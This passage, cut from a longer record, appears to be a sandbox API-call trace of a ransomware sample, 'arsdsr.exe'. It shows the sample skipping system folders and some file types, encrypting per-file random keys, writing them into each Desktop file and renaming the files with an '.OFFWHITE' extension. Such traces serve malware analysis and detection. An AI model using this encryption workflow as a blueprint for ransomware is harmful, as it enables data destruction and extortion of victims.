lpNumberOfBytesWritten=0x295e54c*=0x12c79, lpOverlapped=0x0) returned 1 [0132.080] GetProcessHeap () returned 0x500000 [0132.080] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0132.080] CloseHandle (hObject=0xb0) returned 1 [0132.085] GetProcessHeap () returned 0x500000 [0132.085] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.085] GetProcessHeap () returned 0x500000 [0132.085] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.085] GetProcessHeap () returned 0x500000 [0132.085] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.085] GetProcessHeap () returned 0x500000 [0132.085] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.085] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cQmMoFz3.odt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cQmMoFz3.odt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cQmMoFz3.odt" [0132.085] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cQmMoFz3.odt", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cQmMoFz3.odt.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cQmMoFz3.odt.OFFWHITE" [0132.085] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cQmMoFz3.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cqmmofz3.odt"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cQmMoFz3.odt.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cqmmofz3.odt.offwhite")) returned 1 [0132.087] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe95fcbf0, ftCreationTime.dwHighDateTime=0x1d5e425, ftLastAccessTime.dwLowDateTime=0xc60eb140, ftLastAccessTime.dwHighDateTime=0x1d5dce9, ftLastWriteTime.dwLowDateTime=0xc60eb140, ftLastWriteTime.dwHighDateTime=0x1d5dce9, nFileSizeHigh=0x0, nFileSizeLow=0x3aa0, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="cuvk.png", cAlternateFileName="")) returned 1 [0132.087] lstrcmpiW (lpString1="cuvk.png", lpString2=".") returned 1 [0132.087] lstrcmpiW (lpString1="cuvk.png", lpString2="..") returned 1 [0132.087] lstrcmpiW (lpString1="cuvk.png", lpString2="...") returned 1 [0132.087] lstrcmpiW (lpString1="cuvk.png", lpString2="windows") returned -1 [0132.087] lstrcmpiW (lpString1="cuvk.png", lpString2="$recycle.bin") returned 1 [0132.087] lstrcmpiW (lpString1="cuvk.png", lpString2="rsa") returned -1 [0132.087] lstrcmpiW (lpString1="cuvk.png", lpString2="ntuser.dat") returned -1 [0132.087] lstrcmpiW (lpString1="cuvk.png", lpString2="programdata") returned -1 [0132.087] lstrcmpiW (lpString1="cuvk.png", lpString2="appdata") returned 1 [0132.087] lstrcmpiW (lpString1="cuvk.png", lpString2="program files") returned -1 [0132.087] lstrcmpiW (lpString1="cuvk.png", lpString2="program files (x86)") returned -1 [0132.087] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.087] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="cuvk.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cuvk.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cuvk.png" [0132.088] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.088] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.088] PathFindExtensionW (pszPath="cuvk.png") returned=".png" [0132.088] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0132.088] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0132.088] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0132.088] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0132.088] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0132.088] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0132.088] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0132.088] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0132.088] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0132.088] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0132.088] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0132.088] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0132.088] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0132.088] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0132.088] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0132.088] lstrcmpiW (lpString1="cuvk.png", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.088] GetProcessHeap () returned 0x500000 [0132.088] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547ee8 [0132.088] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cuvk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cuvk.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.089] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=15008) returned 1 [0132.089] GetProcessHeap () returned 0x500000 [0132.089] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.089] GetProcessHeap () returned 0x500000 [0132.089] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.089] GetProcessHeap () returned 0x500000 [0132.089] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.089] GetProcessHeap () returned 0x500000 [0132.089] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.089] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.089] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.090] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.090] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.090] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.090] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.090] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.090] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.090] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.090] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.090] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.090] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.090] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x3aa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.091] SetLastError (dwErrCode=0x0) [0132.091] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.093] GetLastError () returned 0x0 [0132.093] GetLastError () returned 0x0 [0132.093] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x3ba0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.093] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.093] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x3ca0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.093] WriteFile (in: hFile=0xb0, lpBuffer=0x547ee8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547ee8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.093] GetProcessHeap () returned 0x500000 [0132.093] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3aa0) returned 0x5557b0 [0132.093] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.093] ReadFile (in: hFile=0xb0, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x3aa0, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x3aa0, lpOverlapped=0x0) returned 1 [0132.095] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.095] WriteFile (in: hFile=0xb0, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x3aa0, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x3aa0, lpOverlapped=0x0) returned 1 [0132.095] GetProcessHeap () returned 0x500000 [0132.095] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0132.095] CloseHandle (hObject=0xb0) returned 1 [0132.101] GetProcessHeap () returned 0x500000 [0132.101] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.101] GetProcessHeap () returned 0x500000 [0132.101] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.101] GetProcessHeap () returned 0x500000 [0132.101] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.101] GetProcessHeap () returned 0x500000 [0132.101] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.101] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cuvk.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cuvk.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cuvk.png" [0132.101] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cuvk.png", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cuvk.png.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cuvk.png.OFFWHITE" [0132.101] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cuvk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cuvk.png"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cuvk.png.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cuvk.png.offwhite")) returned 1 [0132.103] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0132.103] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0132.103] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0132.103] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0132.103] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0132.103] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0132.103] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0132.103] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0132.103] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0132.103] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0132.103] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0132.103] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0132.103] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.103] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" [0132.103] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.103] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.103] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0132.104] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0132.104] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0132.104] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0132.104] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0132.104] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0132.104] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0132.104] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0132.104] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2b5bd0, ftCreationTime.dwHighDateTime=0x1d5e109, ftLastAccessTime.dwLowDateTime=0x853a57a0, ftLastAccessTime.dwHighDateTime=0x1d5e5cc, ftLastWriteTime.dwLowDateTime=0x853a57a0, ftLastWriteTime.dwHighDateTime=0x1d5e5cc, nFileSizeHigh=0x0, nFileSizeLow=0x146f9, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="dmCXiw2m.odt", cAlternateFileName="")) returned 1 [0132.104] lstrcmpiW (lpString1="dmCXiw2m.odt", lpString2=".") returned 1 [0132.104] lstrcmpiW (lpString1="dmCXiw2m.odt", lpString2="..") returned 1 [0132.104] lstrcmpiW (lpString1="dmCXiw2m.odt", lpString2="...") returned 1 [0132.104] lstrcmpiW (lpString1="dmCXiw2m.odt", lpString2="windows") returned -1 [0132.104] lstrcmpiW (lpString1="dmCXiw2m.odt", lpString2="$recycle.bin") returned 1 [0132.104] lstrcmpiW (lpString1="dmCXiw2m.odt", lpString2="rsa") returned -1 [0132.104] lstrcmpiW (lpString1="dmCXiw2m.odt", lpString2="ntuser.dat") returned -1 [0132.104] lstrcmpiW (lpString1="dmCXiw2m.odt", lpString2="programdata") returned -1 [0132.104] lstrcmpiW (lpString1="dmCXiw2m.odt", lpString2="appdata") returned 1 [0132.104] lstrcmpiW (lpString1="dmCXiw2m.odt", lpString2="program files") returned -1 [0132.104] lstrcmpiW (lpString1="dmCXiw2m.odt", lpString2="program files (x86)") returned -1 [0132.104] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.104] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="dmCXiw2m.odt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dmCXiw2m.odt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dmCXiw2m.odt" [0132.104] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.104] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.104] PathFindExtensionW (pszPath="dmCXiw2m.odt") returned=".odt" [0132.105] lstrcmpiW (lpString1=".odt", lpString2=".exe") returned 1 [0132.105] lstrcmpiW (lpString1=".odt", lpString2=".log") returned 1 [0132.105] lstrcmpiW (lpString1=".odt", lpString2=".cab") returned 1 [0132.105] lstrcmpiW (lpString1=".odt", lpString2=".cmd") returned 1 [0132.105] lstrcmpiW (lpString1=".odt", lpString2=".com") returned 1 [0132.105] lstrcmpiW (lpString1=".odt", lpString2=".cpl") returned 1 [0132.105] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0132.105] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0132.105] lstrcmpiW (lpString1=".odt", lpString2=".url") returned -1 [0132.105] lstrcmpiW (lpString1=".odt", lpString2=".ttf") returned -1 [0132.105] lstrcmpiW (lpString1=".odt", lpString2=".mp3") returned 1 [0132.105] lstrcmpiW (lpString1=".odt", lpString2=".pif") returned -1 [0132.105] lstrcmpiW (lpString1=".odt", lpString2=".mp4") returned 1 [0132.105] lstrcmpiW (lpString1=".odt", lpString2=".OFFWHITE") returned -1 [0132.105] lstrcmpiW (lpString1=".odt", lpString2=".msi") returned 1 [0132.105] lstrcmpiW (lpString1="dmCXiw2m.odt", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.105] GetProcessHeap () returned 0x500000 [0132.105] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547ef8 [0132.105] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dmCXiw2m.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dmcxiw2m.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.106] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=83705) returned 1 [0132.106] GetProcessHeap () returned 0x500000 [0132.106] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.106] GetProcessHeap () returned 0x500000 [0132.106] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.106] GetProcessHeap () returned 0x500000 [0132.106] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.106] GetProcessHeap () returned 0x500000 [0132.106] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.106] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.106] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.106] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.106] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.106] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.106] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.106] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.106] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.107] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.107] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.107] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.107] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.107] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x146f9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.107] SetLastError (dwErrCode=0x0) [0132.107] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.109] GetLastError () returned 0x0 [0132.109] GetLastError () returned 0x0 [0132.110] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x147f9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.110] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.110] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x148f9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.110] WriteFile (in: hFile=0xb0, lpBuffer=0x547ef8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547ef8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.110] GetProcessHeap () returned 0x500000 [0132.110] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x146f9) returned 0x5557b0 [0132.110] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.110] ReadFile (in: hFile=0xb0, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x146f9, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x146f9, lpOverlapped=0x0) returned 1 [0132.116] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.116] WriteFile (in: hFile=0xb0, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x146f9, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x146f9, lpOverlapped=0x0) returned 1 [0132.116] GetProcessHeap () returned 0x500000 [0132.116] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0132.116] CloseHandle (hObject=0xb0) returned 1 [0132.139] GetProcessHeap () returned 0x500000 [0132.139] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.139] GetProcessHeap () returned 0x500000 [0132.139] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.139] GetProcessHeap () returned 0x500000 [0132.139] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.139] GetProcessHeap () returned 0x500000 [0132.139] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.139] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dmCXiw2m.odt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dmCXiw2m.odt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dmCXiw2m.odt" [0132.139] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dmCXiw2m.odt", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dmCXiw2m.odt.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dmCXiw2m.odt.OFFWHITE" [0132.139] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dmCXiw2m.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dmcxiw2m.odt"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dmCXiw2m.odt.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dmcxiw2m.odt.offwhite")) returned 1 [0132.141] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80060200, ftCreationTime.dwHighDateTime=0x1d5deb2, ftLastAccessTime.dwLowDateTime=0x633528e0, ftLastAccessTime.dwHighDateTime=0x1d5e088, ftLastWriteTime.dwLowDateTime=0x633528e0, ftLastWriteTime.dwHighDateTime=0x1d5e088, nFileSizeHigh=0x0, nFileSizeLow=0x14a52, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="F YK4 PMxMve7si5 sI.gif", cAlternateFileName="FYK4PM~1.GIF")) returned 1 [0132.141] lstrcmpiW (lpString1="F YK4 PMxMve7si5 sI.gif", lpString2=".") returned 1 [0132.141] lstrcmpiW (lpString1="F YK4 PMxMve7si5 sI.gif", lpString2="..") returned 1 [0132.141] lstrcmpiW (lpString1="F YK4 PMxMve7si5 sI.gif", lpString2="...") returned 1 [0132.141] lstrcmpiW (lpString1="F YK4 PMxMve7si5 sI.gif", lpString2="windows") returned -1 [0132.141] lstrcmpiW (lpString1="F YK4 PMxMve7si5 sI.gif", lpString2="$recycle.bin") returned 1 [0132.141] lstrcmpiW (lpString1="F YK4 PMxMve7si5 sI.gif", lpString2="rsa") returned -1 [0132.141] lstrcmpiW (lpString1="F YK4 PMxMve7si5 sI.gif", lpString2="ntuser.dat") returned -1 [0132.141] lstrcmpiW (lpString1="F YK4 PMxMve7si5 sI.gif", lpString2="programdata") returned -1 [0132.141] lstrcmpiW (lpString1="F YK4 PMxMve7si5 sI.gif", lpString2="appdata") returned 1 [0132.141] lstrcmpiW (lpString1="F YK4 PMxMve7si5 sI.gif", lpString2="program files") returned -1 [0132.141] lstrcmpiW (lpString1="F YK4 PMxMve7si5 sI.gif", lpString2="program files (x86)") returned -1 [0132.141] lstrcpyW (in: lpString1=0x295e7e8, 